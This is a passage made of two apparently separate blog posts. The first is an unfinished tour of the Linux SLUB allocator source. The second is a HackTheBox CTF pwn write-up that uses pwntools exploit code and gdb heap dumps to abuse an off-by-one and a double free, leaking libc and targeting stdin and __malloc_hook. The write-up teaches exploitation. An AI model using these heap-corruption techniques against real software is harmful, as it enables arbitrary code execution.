 * %GFP_HIGHUSER
 *	Allocate memory from high memory on behalf of user.
 *
 * Also it is possible to set different flags by OR'ing
 * in one or more of the following additional @flags:
 *
 * %__GFP_HIGH
 *	This allocation has high priority and may use emergency pools.
 *
 * %__GFP_NOFAIL
 *	Indicate that this allocation is in no way allowed to fail
 *	(think twice before using).
 *
 * %__GFP_NORETRY
 *	If memory is not immediately available,
 *	then give up at once.
 *
 * %__GFP_NOWARN
 *	If allocation fails, don't issue any warnings.
 *
 * %__GFP_RETRY_MAYFAIL
 *	Try really hard to succeed the allocation but fail
 *	eventually.
 */

What are the main structures of SLUB management ? This can be described by this picture for which we will review each of the data structures (pic from here):

To cover the whole allocation process, we will review the main structures to then take a look at the actual allocation algorithm. Given the complexity of such structures, each of these structures are treated in separate articles:

kmem_cache

Let's take a look at the source code of the __kmalloc SLUB implemementation:

// https://elixir.bootlin.com/linux/v5.18.12/source/mm/slub.c#L4399
void *__kmalloc(size_t size, gfp_t flags)
{
	struct kmem_cache *s;
	void *ret;

	if (unlikely(size > KMALLOC_MAX_CACHE_SIZE))
		return kmalloc_large(size, flags);

	s = kmalloc_slab(size, flags);

	if (unlikely(ZERO_OR_NULL_PTR(s)))
		return s;

	ret = slab_alloc(s, NULL, flags, _RET_IP_, size);

	trace_kmalloc(_RET_IP_, ret, size, s->size, flags);

	ret = kasan_kmalloc(s, ret, size, flags);

	return ret;
}
EXPORT_SYMBOL(__kmalloc);

Large allocations

Thus, if the requested size is larger than KMALLOC_MAX_CACHE_SIZE, kmalloc_large is called, and kmalloc_order is called according to a particular orderthat represents the number of pages from the requested size:

// https://elixir.bootlin.com/linux/v5.18.12/source/mm/slab_common.c#L944
/*
 * To avoid unnecessary overhead, we pass through large allocation requests
 * directly to the page allocator. We use __GFP_COMP, because we will need to
 * know the allocation order to free the pages properly in kfree.
 */
void *kmalloc_order(size_t size, gfp_t flags, unsigned int order)
{
	void *ret = NULL;
	struct page *page;

	if (unlikely(flags & GFP_SLAB_BUG_MASK))
		flags = kmalloc_fix_flags(flags);

	flags |= __GFP_COMP;
	page = alloc_pages(flags, order);
	if (likely(page)) {
		ret = page_address(page);
		mod_lruvec_page_state(page, NR_SLAB_UNRECLAIMABLE_B,
				PAGE_SIZE << order);
	}
	ret = kasan_kmalloc_large(ret, size, flags);
	/* As ret might get tagged, call kmemleak hook after KASAN. */
	kmemleak_alloc(ret, size, 1, flags);
	return ret;
}
EXPORT_SYMBOL(kmalloc_order);

The __GFP_COMP stands for the allocation of "compound pages", to quote Jonathan Corbet from this article:

A compound page is simply a grouping of two or more physically contiguous pages into a unit that can, in many ways, be treated as a single, larger page. They are most commonly used to create huge pages, used within hugetlbfs or the transparent huge pages subsystem, but they show up in other contexts as well. Compound pages can serve as anonymous memory or be used as buffers within the kernel; they cannot, however, appear in the page cache, which is only prepared to deal with singleton pages.

The actual allocation is made in alloc_pages, more specifically in __alloc_pages that requests pages to the buddy allocator. But that's out of scope for now. Thus what we know is that large allocations are handled directly by the buddy system.

Small allocations

By following the other code path kmalloc_slab is called:

// https://elixir.bootlin.com/linux/v5.18.12/source/mm/slab_common.c#L730
/*
 * Find the kmem_cache structure that serves a given size of
 * allocation
 */
struct kmem_cache *kmalloc_slab(size_t size, gfp_t flags)
{
	unsigned int index;

	if (size <= 192) {
		if (!size)
			return ZERO_SIZE_PTR;

		index = size_index[size_index_elem(size)];
	} else {
		if (WARN_ON_ONCE(size > KMALLOC_MAX_CACHE_SIZE))
			return NULL;
		index = fls(size - 1);
	}

	return kmalloc_caches[kmalloc_type(flags)][index];
}

kmem_cache_init

kmalloc_slab returns the kmalloc_cache entry that matchs the provided flags and size. Let's see how is initialized this array, the main initialization occurs in kmem_cache_init:

void __init kmem_cache_init(void)
{
	static __initdata struct kmem_cache boot_kmem_cache,
			  boot_kmem_cache_node;
	int node;

	if (debug_guardpage_minorder())
		slub_max_order = 0;

	/* Print slub debugging pointers without hashing */
	if (__slub_debug_enabled())
		no_hash_pointers_enable(NULL);

	kmem_cache_node = &boot_kmem_cache_node;
	kmem_cache = &boot_kmem_cache;

	/*
	 * Initialize the nodemask for which we will allocate per node
	 * structures. Here we don't need taking slab_mutex yet.
	 */
	for_each_node_state(node, N_NORMAL_MEMORY)
		node_set(node, slab_nodes);

slab_nodes is a bitmap representing the nodes used by the kernel. Given we're on x86-64 the cpu is NUMA but behaves for compatibility purposes like a UMA system. Which means there is only one node used, and in it one "zone": N_NORMAL_MEMORY. This way for_each_node_state loops only one time:

// https://elixir.bootlin.com/linux/latest/source/include/linux/nodemask.h#L482
#define for_each_node_state(node, __state) \
	for ( (node) = 0; (node) == 0; (node) = 1)

This way slab_nodes is initialized to 1.

Then the first two kmem_cache are created: kmem_cache_node and kmem_cache:

	// https://elixir.bootlin.com/linux/latest/source/mm/slub.c#L4819
	create_boot_cache(kmem_cache_node, "kmem_cache_node",
		sizeof(struct kmem_cache_node), SLAB_HWCACHE_ALIGN, 0, 0);

	register_hotmemory_notifier(&slab_memory_callback_nb);

	/* Able to allocate the per node structures */
	slab_state = PARTIAL;

	create_boot_cache(kmem_cache, "kmem_cache",
			offsetof(struct kmem_cache, node) +
				nr_node_ids * sizeof(struct kmem_cache_node *),
		       SLAB_HWCACHE_ALIGN, 0, 0);

	kmem_cache = bootstrap(&boot_kmem_cache);
	kmem_cache_node = bootstrap(&boot_kmem_cache_node);

	/* Now we can use the kmem_cache to allocate kmalloc slabs */
	setup_kmalloc_cache_index_table();
	create_kmalloc_caches(0);

	/* Setup random freelists for each cache */
	init_freelist_randomization();

	cpuhp_setup_state_nocalls(CPUHP_SLUB_DEAD, "slub:dead", NULL,
				  slub_cpu_dead);

	pr_info("SLUB: HWalign=%d, Order=%u-%u, MinObjects=%u, CPUs=%u, Nodes=%u\n",
		cache_line_size(),
		slub_min_order, slub_max_order, slub_min_objects,
		nr_cpu_ids, nr_node_ids);
}

Let's take a look at the main functions. But before that, let's review the internal layout of the kmem_cache structure.

References

[HackTheBox Cyber Apocalypse 2022 - pwn] Once and for all

Thu, 19 May 2022 00:00:00 GMT

Once for all is a heap challenge I did during the HackTheBox Cyber Apocalypse event. This is a classic unsorted bin attack plus a FSOP on stdin. Find the tasks and the final exploit here and here.

Reverse engineering

All the snippets of pseudo-code are issued by IDA freeware:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [rsp+18h] [rbp-8h] BYREF
  int i; // [rsp+1Ch] [rbp-4h]

  for ( i = 0; i <= 49; ++i )
  {
    puts(s);
    printf(&unk_1310);
    __isoc99_scanf(&unk_13C8, &v4);
    puts(s);
    switch ( v4 )
    {
      case 1:
        small_alloc(s);
        break;
      case 2:
        fix(s);
        break;
      case 3:
        examine(s);
        break;
      case 4:
        savebig(s);
        break;
      case 5:
        exit(0);
      default:
        puts("[-] Invalid choice!");
        break;
    }
  }
  return 0;
}

The binary allows you to allocate a small chunk beetween 0x1f and 0x38 bytes:

int small_alloc()
{
  __int64 v1; // rbx
  size_t nmemb; // [rsp+0h] [rbp-20h] BYREF
  __int64 idx[3]; // [rsp+8h] [rbp-18h] BYREF

  if ( allocated == 15 )
    return puts("Nothing more!");
  ++allocated;
  printf("Choose an index: ");
  __isoc99_scanf("%lu", idx);
  if ( size_array[2 * idx[0]] || (&alloc_array)[2 * idx[0]] || idx[0] > 0xEuLL )
    return puts("[-] Invalid!");
  printf("\nHow much space do you need for it: ");
  __isoc99_scanf("%lu", &nmemb);
  if ( nmemb <= 0x1F || nmemb > 0x38 )
    return puts("[-] Your inventory cannot provide this type of space!");
  size_array[2 * idx[0]] = nmemb;
  v1 = idx[0];
  (&alloc_array)[2 * v1] = (void **)calloc(nmemb, 1uLL);
  if ( !(&alloc_array)[2 * idx[0]] )
  {
    puts("[-] Something didn't work out...");
    exit(-1);
  }
  puts("Input your weapon's details: ");
  
  # off-by-one
  return read(0, (&alloc_array)[2 * idx[0]], nmemb + 1);
}

As you can see right above this function contains an off-by-one vulnerability, which means we can write only one byte right after the allocated chunk, overlapping the size field of the next chunk / top chunk.

The fix function frees a chunk and asks for another size, then it allocates another chunk with calloc.

int fix()
{
  int result; // eax
  unsigned __int64 v1; // rbx
  unsigned __int64 idx; // [rsp+8h] [rbp-28h] BYREF
  size_t size; // [rsp+10h] [rbp-20h] BYREF
  __int64 v4[3]; // [rsp+18h] [rbp-18h] BYREF

  printf("Choose an index: ");
  __isoc99_scanf("%lu", &idx);
  if ( !size_array[2 * idx] || !alloc_array[2 * idx] || idx > 0xE )
    return puts("[-] Invalid!");
  puts("Ok, let's get you some new parts for this one... seems like it's broken");
  free(alloc_array[2 * idx]);
  printf("\nHow much space do you need for this repair: ");
  __isoc99_scanf("%lu", &size);
  if ( size <= 0x1F || size > 0x38 )
    # [1] 
    return puts("[-] Your inventory cannot provide this type of space.");
  size_array[2 * idx] = size;
  v1 = idx;
  alloc_array[2 * v1] = calloc(size, 1uLL);
  if ( !alloc_array[2 * idx] )
  {
    puts("Something didn't work out...");
    exit(-1);
  }
  puts("Input your weapon's details: ");
  read(0, alloc_array[2 * idx], size);
  printf("What would you like to do now?\n1. Verify weapon\n2. Continue\n>> ");
  __isoc99_scanf("%lu", v4);
  result = v4[0];
  if ( v4[0] == 1 )
  {
    if ( verified )
    {
      return puts(&unk_1648);
    }
    else
    {
      result = puts((const char *)alloc_array[2 * idx]);
      verified = 1;
    }
  }
  return result;
}

If we reach [1], alloc_array[2 * idx] is freed leading to a double free.

We can print a chunk only one time:

int examine()
{
  unsigned __int64 v1; // [rsp+8h] [rbp-8h] BYREF

  if ( examined )
    return puts(&unk_14D0);
  examined = 1;
  printf("Choose an index: ");
  __isoc99_scanf("%lu", &v1);
  if ( size_array[2 * v1] && alloc_array[2 * v1] && v1 <= 0xE )
    return puts((const char *)alloc_array[2 * v1]);
  else
    return puts("[-] Invalid!");
}

Finally we can malloc a huge chunk, but we cannot wriet anything within:

int savebig()
{
  void *v0; // rax
  size_t size; // [rsp+8h] [rbp-8h] BYREF

  if ( chungus_weapon || qword_202068 )
  {
    LODWORD(v0) = puts(&unk_16E8);
  }
  else
  {
    printf("How much space do you need for this massive weapon: ");
    __isoc99_scanf("%lu", &size);
    if ( (unsigned __int16)size > 0x5AFu && (unsigned __int16)size <= 0xF5C0u )
    {
      puts("Adding to your inventory..");
      chungus_weapon = size;
      v0 = malloc(size);
      qword_202068 = (__int64)v0;
    }
    else
    {
      LODWORD(v0) = puts("[-] This is not possible..");
    }
  }
  return (int)v0;
}

Exploitation

What we have

An off-by-one when we create a new chunk
Double free by calling fix and then providing an invalid size.
Trivial read after free thanks to the double free.

Restrictions

The program does not use printf with a format specifer, then we cannot do a House of husk.
We can only allocate 15 chunks.
All the allocations except the big one are made using calloc, even if it can be easily bypassed by adding the IS_MAPPED flag to the chunk header to avoid zero-ing.
The libc version (2.27) mitigates a few techniques, especially the House of Orange and introduces the tcache.
Allocations have to fit in only two fastbins (0x30 / 0x40), which means we cannot get an arbitrary with a fastbin dup technique due to the size of most of interesting memory areas in the libc (0x7f => 0x70 fastbin against 0x30 / 0x40 in our case).

How to leak libc ?

Partial overwrites are as far as I know very hard to get because of calloc. The first thing to do is to leak libc addresses to then target libc global variables / structures. The classic way to get a libc leak is to free a chunk that belongs to the unsorted bin and then print it. But as seen previously, we cannot allocate a large chunks that would end up in the unsorted bin. To do so we have to use the off-by-one bug to overwrite the next chunk's size field with a bigger one that would correspond to the unsorted bin (>= 0x90). We can edit the size of the second chunk from 0x30 to 0xb0 by doing:

def add(idx, size, data, hang=False):
    io.sendlineafter(b">> ", b"1")
    io.sendlineafter(b"Choose an index: ", str(idx).encode())
    io.sendlineafter(b"How much space do you need for it: ", str(size).encode())
    if hang == True:
        return

    io.sendlineafter(b"Input your weapon's details: \n", data)

def freexalloc(idx, size, data, doubleFree=False):
    io.sendlineafter(b">> ", b"2")
    io.sendlineafter(b"Choose an index: ", str(idx).encode())
    io.sendlineafter(b"How much space do you need for this repair: ", str(size).encode())

    if doubleFree:
        return

    io.sendlineafter(b"Input your weapon's details: \n", data)
    io.sendlineafter(b">> ", b"1")

def show(idx):
    io.sendlineafter(b">> ", b"3")
    io.sendlineafter(b"Choose an index: ", str(idx).encode())

def allochuge(size):
    io.sendlineafter(b">> ", b"4")
    io.sendlineafter(b"How much space do you need for this massive weapon: ", str(size).encode())

# get libc leak

add(0, 56, b"A"*55)
add(1, 56, b"B"*39)
add(2, 40, b"C"*39) # size
add(4, 56, b"D"*(0x10))
add(5, 40, b"E"*39)

add(10, 40, pwn.p64(0) + pwn.p64(0x21)) # barrier

# freexalloc(5, 560, b"", doubleFree=True)

freexalloc(1, 560, b"", doubleFree=True)
freexalloc(0, 560, b"", doubleFree=True)
freexalloc(2, 560, b"", doubleFree=True)

freexalloc(1, 560, b"", doubleFree=True)
add(6, 56, b"\x00"*56  + b"\xb1") # fake unsorted chunk

"""
0x555555608560:	0x0000000000000000	0x0000000000000041 [0]
0x555555608570:	0x00005555556085a0	0x4141414141414141
0x555555608580:	0x4141414141414141	0x4141414141414141
0x555555608590:	0x4141414141414141	0x4141414141414141
0x5555556085a0:	0x0a41414141414141	0x0000000000000041 [1]
0x5555556085b0:	0x0000000000000000	0x0000000000000000
0x5555556085c0:	0x0000000000000000	0x0000000000000000
0x5555556085d0:	0x0000000000000000	0x0000000000000000
0x5555556085e0:	0x0000000000000000	0x00000000000000b1 [2] <- Fake size | PREV_INUSE (1)
0x5555556085f0:	0x0000000000000000	0x4343434343434343	 
0x555555608600:	0x4343434343434343	0x4343434343434343	 
0x555555608610:	0x0a43434343434343	0x0000000000000041 [3]	 
0x555555608620:	0x4444444444444444	0x4444444444444444	 
0x555555608630:	0x000000000000000a	0x0000000000000000
0x555555608640:	0x0000000000000000	0x0000000000000000	 
0x555555608650:	0x0000000000000000	0x0000000000000031 [4]	 
0x555555608660:	0x4545454545454545	0x4545454545454545	 
0x555555608670:	0x4545454545454545	0x4545454545454545	 
0x555555608680:	0x0a45454545454545	0x0000000000000031 [10]	 
0x555555608690:	0x0000000000000000	0x0000000000000021 <- Fake chunk header 
0x5555556086a0:	0x000000000000000a	0x0000000000000000
0x5555556086b0:	0x0000000000000000	0x0000000000020951 <- Top chunk


fastbins
0x30: 0x5555556085e0 ◂— 0x0
0x40: 0x555555608560 —▸ 0x5555556085a0 ◂— 0x0
"""

We allocate 6 chunks, we do need of 6 chunks because of the fake size we write on chunk_2 (&chunk_2 + 0xb0 = 0x555555608690, in the last chunk near the top chunk). In the same way we craft a fake header in the body of the last chunk to avoid issues during the release of chunk_2. If you're not familiar with the security checks done by malloc and free, I would advise you to take a look at this resource.

Now that chunk_2 has been tampered with a fake 0xb0 size, we just have to free it 8 times (to fill the tcache) to put it in the unsorted bin:

freexalloc(2, 560, b"", doubleFree=True)
freexalloc(2, 560, b"", doubleFree=True)
freexalloc(2, 560, b"", doubleFree=True)
freexalloc(2, 560, b"", doubleFree=True)
freexalloc(2, 560, b"", doubleFree=True)
freexalloc(2, 560, b"", doubleFree=True)
freexalloc(2, 560, b"", doubleFree=True)

freexalloc(2, 560, b"", doubleFree=True)
# falls into the unsortedbin

show(2)

libc = pwn.u64(io.recvline()[:-1].ljust(8, b"\x00")) - 0x3ebca0 # offset of the unsorted bin

stdin = libc + 0x3eba00
pwn.log.info(f"libc: {hex(libc)}")

"""
0x555555608560:	0x0000000000000000	0x0000000000000041
0x555555608570:	0x00005555556085a0	0x4141414141414141
0x555555608580:	0x4141414141414141	0x4141414141414141
0x555555608590:	0x4141414141414141	0x4141414141414141
0x5555556085a0:	0x0a41414141414141	0x0000000000000041
0x5555556085b0:	0x0000000000000000	0x0000000000000000
0x5555556085c0:	0x0000000000000000	0x0000000000000000
0x5555556085d0:	0x0000000000000000	0x0000000000000000
0x5555556085e0:	0x0000000000000000	0x00000000000000b1
0x5555556085f0:	0x00007ffff7dcfca0	0x00007ffff7dcfca0
0x555555608600:	0x4343434343434343	0x4343434343434343
0x555555608610:	0x0a43434343434343	0x0000000000000041
0x555555608620:	0x4444444444444444	0x4444444444444444
0x555555608630:	0x000000000000000a	0x0000000000000000
0x555555608640:	0x0000000000000000	0x0000000000000000
0x555555608650:	0x0000000000000000	0x0000000000000031
0x555555608660:	0x4545454545454545	0x4545454545454545
0x555555608670:	0x4545454545454545	0x4545454545454545
0x555555608680:	0x0a45454545454545	0x0000000000000031
0x555555608690:	0x00000000000000b0	0x0000000000000020
0x5555556086a0:	0x000000000000000a	0x0000000000000000
0x5555556086b0:	0x0000000000000000	0x0000000000020951

unsortedbin
all: 0x5555556085e0 —▸ 0x7ffff7dcfca0 (main_arena+96) ◂— 0x5555556085e0
tcachebins
0xb0 [  7]: 0x5555556085f0 —▸ 0x7ffff7dcfca0 (main_arena+96) —▸ 0x5555556086b0 ◂— 0x0
"""

Which gives:

nasm@off:~/Documents/pwn/HTB/apocalypse/onceAndmore$ python3 exploit.py LOCAL GDB NOASLR
[*] '/home/nasm/Documents/pwn/HTB/apocalypse/onceAndmore/once_and_for_all'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
    RUNPATH:  b'/home/nasm/Documents/pwn/HTB/apocalypse/onceAndmore/out'
[!] Debugging process with ASLR disabled
[+] Starting local process '/usr/bin/gdbserver': pid 31378
[*] running in new terminal: ['/usr/bin/gdb', '-q', '/home/nasm/Documents/pwn/HTB/apocalypse/onceAndmore/once_and_for_all', '-x', '/tmp/pwn1z_5e0ie.gdb']
[*] libc: 0x7ffff79e4000

We now have achieved the first step of the challenge: leak the libc base address.

What can we target in the libc ?

There are a lot of ways to achieve code execution according to what I red in other write-ups, I choose to attack _IO_stdin by running an unsorted bin attack on its _IO_buf_end field which holds the end of the internal buffer of stdin from _IO_buf_base, according to the glibc source code:

int
_IO_new_file_underflow (_IO_FILE *fp)
{
  _IO_ssize_t count;
#if 0
  /* SysV does not make this test; take it out for compatibility */
  if (fp->_flags & _IO_EOF_SEEN)
    return (EOF);
#endif

  if (fp->_flags & _IO_NO_READS)
    {
      fp->_flags |= _IO_ERR_SEEN;
      __set_errno (EBADF);
      return EOF;
    }
  if (fp->_IO_read_ptr < fp->_IO_read_end)
    return *(unsigned char *) fp->_IO_read_ptr;

  if (fp->_IO_buf_base == NULL)
    {
      /* Maybe we already have a push back pointer.  */
      if (fp->_IO_save_base != NULL)
	{
	  free (fp->_IO_save_base);
	  fp->_flags &= ~_IO_IN_BACKUP;
	}
      _IO_doallocbuf (fp);
    }

  /* Flush all line buffered files before reading. */
  /* FIXME This can/should be moved to genops ?? */
  if (fp->_flags & (_IO_LINE_BUF|_IO_UNBUFFERED))
    {
#if 0
      _IO_flush_all_linebuffered ();
#else
      /* We used to flush all line-buffered stream.  This really isn't
	 required by any standard.  My recollection is that
	 traditional Unix systems did this for stdout.  stderr better
	 not be line buffered.  So we do just that here
	 explicitly.  --drepper */
      _IO_acquire_lock (_IO_stdout);

      if ((_IO_stdout->_flags & (_IO_LINKED | _IO_NO_WRITES | _IO_LINE_BUF))
	  == (_IO_LINKED | _IO_LINE_BUF))
	_IO_OVERFLOW (_IO_stdout, EOF);

      _IO_release_lock (_IO_stdout);
#endif
    }

  _IO_switch_to_get_mode (fp);

  /* This is very tricky. We have to adjust those
     pointers before we call _IO_SYSREAD () since
     we may longjump () out while waiting for
     input. Those pointers may be screwed up. H.J. */
  fp->_IO_read_base = fp->_IO_read_ptr = fp->_IO_buf_base;
  fp->_IO_read_end = fp->_IO_buf_base;
  fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_write_end
    = fp->_IO_buf_base;

  count = _IO_SYSREAD (fp, fp->_IO_buf_base,
		       fp->_IO_buf_end - fp->_IO_buf_base);
  if (count <= 0)
    {
      if (count == 0)
	fp->_flags |= _IO_EOF_SEEN;
      else
	fp->_flags |= _IO_ERR_SEEN, count = 0;
  }
  fp->_IO_read_end += count;
  if (count == 0)
    {
      /* If a stream is read to EOF, the calling application may switch active
	 handles.  As a result, our offset cache would no longer be valid, so
	 unset it.  */
      fp->_offset = _IO_pos_BAD;
      return EOF;
    }
  if (fp->_offset != _IO_pos_BAD)
    _IO_pos_adjust (fp->_offset, count);
  return *(unsigned char *) fp->_IO_read_ptr;
}

The interesting part is the count = _IO_SYSREAD (fp, fp->_IO_buf_base, fp->_IO_buf_end - fp->_IO_buf_base); which reads fp->_IO_buf_end - fp->_IO_buf_base bytes in fp->_IO_buf_base. Which means if fp->_IO_buf_end is replaced with the help of an unsorted bin attack by the address of the unsorted bin and that &unsorted bin > fp->_IO_buf_base, we can trigger an out of bound write from a certain address up to the address of the unsorted bin. We can inspect the layout in gdb to see what's actually going on:

pwndbg> x/100gx stdin
0x7ffff7dcfa00 <_IO_2_1_stdin_>:	0x00000000fbad208b	0x00007ffff7dcfa83
0x7ffff7dcfa10 <_IO_2_1_stdin_+16>:	0x00007ffff7dcfa83	0x00007ffff7dcfa83
0x7ffff7dcfa20 <_IO_2_1_stdin_+32>:	0x00007ffff7dcfa83	0x00007ffff7dcfa83
0x7ffff7dcfa30 <_IO_2_1_stdin_+48>:	0x00007ffff7dcfa83	0x00007ffff7dcfa83
0x7ffff7dcfa40 <_IO_2_1_stdin_+64>:	0x00007ffff7dcfa84	0x0000000000000000
0x7ffff7dcfa50 <_IO_2_1_stdin_+80>:	0x0000000000000000	0x0000000000000000
0x7ffff7dcfa60 <_IO_2_1_stdin_+96>:	0x0000000000000000	0x0000000000000000
0x7ffff7dcfa70 <_IO_2_1_stdin_+112>:	0x0000001000000000	0xffffffffffffffff
0x7ffff7dcfa80 <_IO_2_1_stdin_+128>:	0x000000000a000000	0x00007ffff7dd18d0
0x7ffff7dcfa90 <_IO_2_1_stdin_+144>:	0xffffffffffffffff	0x0000000000000000
0x7ffff7dcfaa0 <_IO_2_1_stdin_+160>:	0x00007ffff7dcfae0	0x0000000000000000
0x7ffff7dcfab0 <_IO_2_1_stdin_+176>:	0x0000000000000000	0x0000000000000000
0x7ffff7dcfac0 <_IO_2_1_stdin_+192>:	0x00000000ffffffff	0x0000000000000000
0x7ffff7dcfad0 <_IO_2_1_stdin_+208>:	0x0000000000000000	0x00007ffff7dcc2a0
0x7ffff7dcfae0 <_IO_wide_data_0>:	0x0000000000000000	0x0000000000000000
0x7ffff7dcfaf0 <_IO_wide_data_0+16>:	0x0000000000000000	0x0000000000000000
0x7ffff7dcfb00 <_IO_wide_data_0+32>:	0x0000000000000000	0x0000000000000000
0x7ffff7dcfb10 <_IO_wide_data_0+48>:	0x0000000000000000	0x0000000000000000
0x7ffff7dcfb20 <_IO_wide_data_0+64>:	0x0000000000000000	0x0000000000000000
0x7ffff7dcfb30 <_IO_wide_data_0+80>:	0x0000000000000000	0x0000000000000000
0x7ffff7dcfb40 <_IO_wide_data_0+96>:	0x0000000000000000	0x0000000000000000
0x7ffff7dcfb50 <_IO_wide_data_0+112>:	0x0000000000000000	0x0000000000000000
0x7ffff7dcfb60 <_IO_wide_data_0+128>:	0x0000000000000000	0x0000000000000000
0x7ffff7dcfb70 <_IO_wide_data_0+144>:	0x0000000000000000	0x0000000000000000
0x7ffff7dcfb80 <_IO_wide_data_0+160>:	0x0000000000000000	0x0000000000000000
0x7ffff7dcfb90 <_IO_wide_data_0+176>:	0x0000000000000000	0x0000000000000000
0x7ffff7dcfba0 <_IO_wide_data_0+192>:	0x0000000000000000	0x0000000000000000
0x7ffff7dcfbb0 <_IO_wide_data_0+208>:	0x0000000000000000	0x0000000000000000
0x7ffff7dcfbc0 <_IO_wide_data_0+224>:	0x0000000000000000	0x0000000000000000
0x7ffff7dcfbd0 <_IO_wide_data_0+240>:	0x0000000000000000	0x0000000000000000
0x7ffff7dcfbe0 <_IO_wide_data_0+256>:	0x0000000000000000	0x0000000000000000
0x7ffff7dcfbf0 <_IO_wide_data_0+272>:	0x0000000000000000	0x0000000000000000
0x7ffff7dcfc00 <_IO_wide_data_0+288>:	0x0000000000000000	0x0000000000000000
0x7ffff7dcfc10 <_IO_wide_data_0+304>:	0x00007ffff7dcbd60	0x0000000000000000
0x7ffff7dcfc20 <__memalign_hook>:	0x00007ffff7a7b410	0x00007ffff7a7c790
0x7ffff7dcfc30 <__malloc_hook>:	0x0000000000000000	0x0000000000000000
0x7ffff7dcfc40 <main_arena>:	0x0000000000000000	0x0000000000000001
0x7ffff7dcfc50 <main_arena+16>:	0x0000000000000000	0x00005555556085e0
0x7ffff7dcfc60 <main_arena+32>:	0x0000555555608560	0x0000000000000000
0x7ffff7dcfc70 <main_arena+48>:	0x0000000000000000	0x0000000000000000
0x7ffff7dcfc80 <main_arena+64>:	0x0000000000000000	0x0000000000000000
0x7ffff7dcfc90 <main_arena+80>:	0x0000000000000000	0x0000000000000000
0x7ffff7dcfca0 <main_arena+96>:	0x00005555556086b0	<- &unsortedbin = 0x7ffff7dcfca0
pwndbg> p *stdin
$1 = {
  _flags = -72540021,
  _IO_read_ptr = 0x7ffff7dcfa83 <_IO_2_1_stdin_+131> "\n",
  _IO_read_end = 0x7ffff7dcfa83 <_IO_2_1_stdin_+131> "\n",
  _IO_read_base = 0x7ffff7dcfa83 <_IO_2_1_stdin_+131> "\n",
  _IO_write_base = 0x7ffff7dcfa83 <_IO_2_1_stdin_+131> "\n",
  _IO_write_ptr = 0x7ffff7dcfa83 <_IO_2_1_stdin_+131> "\n",
  _IO_write_end = 0x7ffff7dcfa83 <_IO_2_1_stdin_+131> "\n",
  _IO_buf_base = 0x7ffff7dcfa83 <_IO_2_1_stdin_+131> "\n",
  _IO_buf_end = 0x7ffff7dcfa84 <_IO_2_1_stdin_+132> "",
  _IO_save_base = 0x0,
  _IO_backup_base = 0x0,
  _IO_save_end = 0x0,
  _markers = 0x0,
  _chain = 0x0,
  _fileno = 0,
  _flags2 = 16,
  _old_offset = -1,
  _cur_column = 0,
  _vtable_offset = 0 '\000',
  _shortbuf = "\n",
  _lock = 0x7ffff7dd18d0 <_IO_stdfile_0_lock>,
  _offset = -1,
  _codecvt = 0x0,
  _wide_data = 0x7ffff7dcfae0 <_IO_wide_data_0>,
  _freeres_list = 0x0,
  _freeres_buf = 0x0,
  __pad5 = 0,
  _mode = -1,
  _unused2 = '\000' <repeats 19 times>
}

As you can see right above and according to the source code showed previously, _IO_stdin->_IO_buf_base points toward _IO_stdin->_shortbuf, an internal buffer directly in stdin. And &unsortedbin > _IO_buf_base > stdin. If you do not understand fully my explanations, I advise you to take a look at this great article.

Then we should be able to control every bytes between &stdin->_shortbuf and &unsortedbin. And the incredible thing to note is that in this small range, there is what every heap pwner is always looking for: __malloc_hook !!

Then we just have to overwrite the pointers inside stdin, _IO_wide_data_0 and __memalign_hook to finally reach __malloc_hook and write the address of a one-gadget !

Unsorted bin attack on stdin->_IO_buf_end

Here was theory, let's see how we can do that. To understand unsorted bin attack here is a good article about unsorted bin attack. The unsorted bin attack using partial unlink is basically:

overwrite the backward pointer of the last chunk in the unsorted bin by &target - 0x10
request the exact size of the last chunk in the unsorted bin
It should write at &target the address of the unsorted bin

An essential thing to note is that if there is no chunks in your fastbin / smallbin and that you're requesting a fastbin/smallbin-sized chunk, the unsorted bin will be inspected and if the last chunk doesn't fit the request, the program will most of the time issues a malloc(): memory corruption. Anyway the best thing to do is to take a look at the code:

static void *
_int_malloc (mstate av, size_t bytes)
{

// It checks first fastbin then smallbin then unsorted bin

for (;; )
    {
      int iters = 0;
      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
        {
          bck = victim->bk;
          if (__builtin_expect (chunksize_nomask (victim) <= 2 * SIZE_SZ, 0)
              || __builtin_expect (chunksize_nomask (victim)
				   > av->system_mem, 0))
            malloc_printerr ("malloc(): memory corruption");
          size = chunksize (victim);

          /*
             If a small request, try to use last remainder if it is the
             only chunk in unsorted bin.  This helps promote locality for
             runs of consecutive small requests. This is the only
             exception to best-fit, and applies only when there is
             no exact fit for a small chunk.
           */

          if (in_smallbin_range (nb) &&
              bck == unsorted_chunks (av) &&
              victim == av->last_remainder &&
              (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
            {
              /* split and reattach remainder */
              remainder_size = size - nb;
              remainder = chunk_at_offset (victim, nb);
              unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
              av->last_remainder = remainder;
              remainder->bk = remainder->fd = unsorted_chunks (av);
              if (!in_smallbin_range (remainder_size))
                {
                  remainder->fd_nextsize = NULL;
                  remainder->bk_nextsize = NULL;
                }

              set_head (victim, nb | PREV_INUSE |
                        (av != &main_arena ? NON_MAIN_ARENA : 0));
              set_head (remainder, remainder_size | PREV_INUSE);
              set_foot (remainder, remainder_size);

              check_malloced_chunk (av, victim, nb);
              void *p = chunk2mem (victim);
              alloc_perturb (p, bytes);
              return p;
            }

          /* remove from unsorted list */
          unsorted_chunks (av)->bk = bck;
          bck->fd = unsorted_chunks (av);

          /* Take now instead of binning if exact fit */

          if (size == nb)
            {
              set_inuse_bit_at_offset (victim, size);
              if (av != &main_arena)
		set_non_main_arena (victim);
#if USE_TCACHE
	      /* Fill cache first, return to user only if cache fills.
		 We may return one of these chunks later.  */
	      if (tcache_nb
		  && tcache->counts[tc_idx] < mp_.tcache_count)
		{
		  tcache_put (victim, tc_idx);
		  return_cached = 1;
		  continue;
		}
	      else
		{
#endif
              check_malloced_chunk (av, victim, nb);
              void *p = chunk2mem (victim);
              alloc_perturb (p, bytes);
              return p;
#if USE_TCACHE
		}
#endif
            }

	[...]
}

According to what I said earlier, the goal is to replace stdin->_IO_buf_end with &unsortedbin which means we have to write to the backward pointer of the last chunk in the unsorted bin (chunk_2) &stdin->_IO_buf_end - 0x10. To do so we can trigger a write after free primitive by taking back chunk_2 from the unsorted bin to the fastbin:

"""
Before:
